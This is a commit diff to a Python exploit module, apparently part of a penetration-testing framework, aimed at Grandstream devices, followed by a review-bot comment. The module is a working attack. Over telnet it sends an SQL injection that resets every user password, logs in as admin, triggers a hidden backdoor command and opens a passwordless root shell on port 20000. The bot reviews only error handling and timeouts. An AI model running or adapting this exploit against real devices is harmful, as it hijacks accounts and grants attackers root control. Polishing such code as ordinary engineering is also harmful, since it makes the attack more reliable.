Commit 311d72d9 by Joshua Abraham

Moved try-catch to check method and removed unnecessary except

parent e949a544
...@@ -30,50 +30,49 @@ class Exploit(exploits.Exploit): ...@@ -30,50 +30,49 @@ class Exploit(exploits.Exploit):
port = exploits.Option(23, 'Target port') # default port port = exploits.Option(23, 'Target port') # default port
def run(self): def run(self):
try: if self.check():
if self.check(): print_success("Target appears to be vulnerable...")
print_success("Target appears to be vulnerable...")
try: try:
conn = telnetlib.Telnet(self.target, self.port) conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ") conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a' conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("nothing\r\n") conn.write("nothing\r\n")
conn.read_until("Username: ") conn.read_until("Username: ")
conn.write("admin\r\n") conn.write("admin\r\n")
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("a\r\n") # Login with the new password conn.write("a\r\n") # Login with the new password
conn.read_until("> ") conn.read_until("> ")
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ") conn.read_until("> ")
conn.write("quit\r\n") conn.write("quit\r\n")
conn.close() conn.close()
print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell") print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
except: except:
print_error("Exploit failed. Could not log in.") print_error("Exploit failed. Could not log in.")
try: try:
conn = telnetlib.Telnet(self.target, 20000) conn = telnetlib.Telnet(self.target, 20000)
conn.read_until("login: ") conn.read_until("login: ")
conn.write("root\r\n") conn.write("root\r\n")
conn.read_until("Password: ") conn.read_until("Password: ")
conn.write("\r\n") conn.write("\r\n")
conn.read_until("# ") conn.read_until("# ")
print_success("Authenticaiton Successful") print_success("Authenticaiton Successful")
conn.interact() conn.interact()
except: except:
print_error("Failed to log into backdoor.") print_error("Failed to log into backdoor.")
else: else:
print_error("Exploit failed. Target does not appear vulnerable") print_error("Exploit failed. Target does not appear vulnerable")
except Exception as err:
print_error("{}".format(err))
@mute @mute
def check(self): def check(self):
conn = telnetlib.Telnet(self.target, self.port) try:
conn = telnetlib.Telnet(self.target, self.port)
except:
return False
output = conn.read_until("login:") output = conn.read_until("login:")
if 'Grandstream' in output: if 'Grandstream' in output:
return True return True
else: return False
return False
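Review bot: In the new `check()`, only the `telnetlib.Telnet(...)` connect sits inside the `try`; the following `conn.read_until("login:")` is outside it and has no timeout. Because this commit also drops the outer `except Exception as err` from `run()`, an `EOFError` or socket error from that read now appears to propagate out of `run()` unhandled, unless `@mute` or the framework catches it, which is not visible here. Move the read into the guarded block and bound it, e.g. `output = conn.read_until("login:", 5)`, and replace the bare `except:` with `except (socket.error, EOFError):` so that Ctrl-C and programming errors are not silently reported as "not vulnerable"; this needs `socket` imported if the file does not already import it. The connection opened in `check()` is also never closed, so a `conn.close()` before returning would avoid leaving a session open on the device. Indentation is lost in this rendering, so the nesting described here is inferred.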